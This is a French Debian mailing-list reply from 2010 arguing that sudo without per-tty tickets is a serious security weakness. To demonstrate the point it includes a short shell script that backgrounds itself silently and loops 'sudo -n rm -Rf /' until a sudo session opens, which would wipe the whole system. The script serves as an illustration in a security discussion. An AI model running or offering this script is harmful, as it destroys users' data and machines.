Re: sudo et with--tty-tickets [posté aussi sur user]
> Julien BLACHE
> Fri, 29 Jan 2010 11:27:09 -0800
>
> François Boisson <user.anti-s...@maison.homelinux.net> wrote:
>
> > Cela veut dire qu'une utilisation à la Ubuntu de sudo rend la machine
> > fragile et sensible à n'importe quel script exécuté sans faire attention
> > comme sous windows.
>
> Tu as très bien identifié le problème, tu sais donc parfaitement quoi
> faire pour le résoudre.
>
> JB.
Oui, effectivement je précise que
1) J'ai recompilé des paquets pour squeeze et lenny avec l'option activée
(i386 et amd64).
2) Je n'aime pas sudo et ne l'utilise pas
3) je considère que chacun est libre de faire ce qu'il veut et qu'utiliser
sudo n'est peut être une tare (même si je désapprouve). Qu'une configuartion
de debian par défaut fasse qu'éxécuter une fois le script
#!/bin/sh
if [ -z $1 ] ; then
FILE=$0
. $FILE vasy > /dev/null 2> /dev/null &
else
while /bin/true ; do
sudo -n rm -Rf / > /dev/null 2>&1
sleep 60
done
fi
suffit pour qu'au premier sudo la machine soit flinguée me parait une faille
de sécurité grave.
Effectivement en ce qui me concerne je suis tranquille, lmais là je ne pensais
pas à moi.
François Boisson
Reply to: